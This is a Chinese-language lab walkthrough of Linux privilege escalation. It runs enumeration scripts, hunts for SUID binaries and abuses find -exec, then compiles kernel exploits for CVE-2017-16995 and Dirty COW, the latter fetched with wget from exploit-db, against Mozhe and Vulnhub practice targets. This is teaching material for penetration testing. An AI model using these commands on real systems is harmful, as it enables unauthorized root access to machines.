权限提升-Linux脏牛内核漏洞&SUID&信息收集

QQ截图20220511102836.jpg

linux提权自动化脚本利用-4个脚本

两个信息收集

两个漏洞探针

LinEnum——Linux枚举及权限提升检查工具

#脚本先上传到目标服务器/tmp目录下(/tmp目录是临时目录,一般是可读写可执行的)
cd /tmp
chmod +x LinEnum.sh
./LinEnum.sh

主要检测以下几个大类的信息

  • 内核和发行版发布详情
  • 系统信息
  • 用户信息
  • 特权访问
  • 环境
  • 作业/任务
  • 服务
  • 一些web服务的版本信息
  • 默认/弱凭证
  • 搜索
  • 平台/软件特定测试

QQ截图20220511110728.jpg

Linuxprivchecker——Linux 权限提升检查脚本

python linuxprivchecker.py
python linuxprivchecker.py -w -o linuxprivchecker.log

QQ截图20220511110900.jpg

linux-exploit-suggester——Linux 提权审计工具

#脚本先上传到目标服务器/tmp目录下(/tmp目录是临时目录,一般是可读写可执行的)
cd /tmp
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

QQ截图20220511124120.jpg

linux-exploit-suggester-2

perl linux-exploit-suggester-2.pl

QQ截图20220511124238.jpg

linux提权suid配合脚本演示

本来是普通用户执行普通程序,但是一旦给了程序suid权限,程序在运行中就会以root 权限执行,从而提升权限

  • test.sh原来的权限是-rwxr-xr-x,当执行chmod u+s test.sh命令后,它的权限就会变成-rwsr-xr-x.即使你用普通用户身份运行test.sh文件,实际上它却是以root权限运行的
  • SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了
  • https://pentestlab.blog/2017/09/25/suid-executables/

已知的可用来提权的程序如下

  1. nmap
  2. vim
  3. find
  4. bash
  5. more
  6. less
  7. nano
  8. cp

冰蝎获取shell

排查命令

#可以使用`LinEnum.sh`进行搜索,也可以用命令进行查找
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

QQ截图20220511125827.jpg

  • 执行以下命令,确认以root身份运行。即 当我们使用find pentestlab -exec <命令> \;的形式运行命令时,使用的是root身份
touch pentestlab
find pentestlab -exec whoami \;

QQ截图20220511125908.jpg

linux提权本地配合内核漏洞演示-Mozhe

上传漏洞探针linux-exploit-suggester2并执行

QQ截图20220511130656.jpg

尝试利用漏洞CVE-2017-16995

上传exp到靶机并执行

gcc 45010.c -o 45010
chmod +x 45010
./45010
id

QQ截图20220511131036.jpg

linux提权脏牛内核漏洞演示-Vulnhub

部署好以后获得ip地址进行扫描

nmap -p- 192.168.50.51

QQ截图20220511131947.jpg

QQ截图20220511132002.jpg

尝试利用Drupal进行突破

search Drupal
use 4
show options
set RHOSTS 192.168.50.51
set rport 1898
run

QQ截图20220511132743.jpg

上传一个漏洞探针脚本linux-exploit-suggester.sh

QQ截图20220511135023.jpg

尝试利用漏洞

wget https://www.exploit-db.com/download/40847
mv 40847 40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
./dcow -s

QQ截图20220511134952.jpg

资源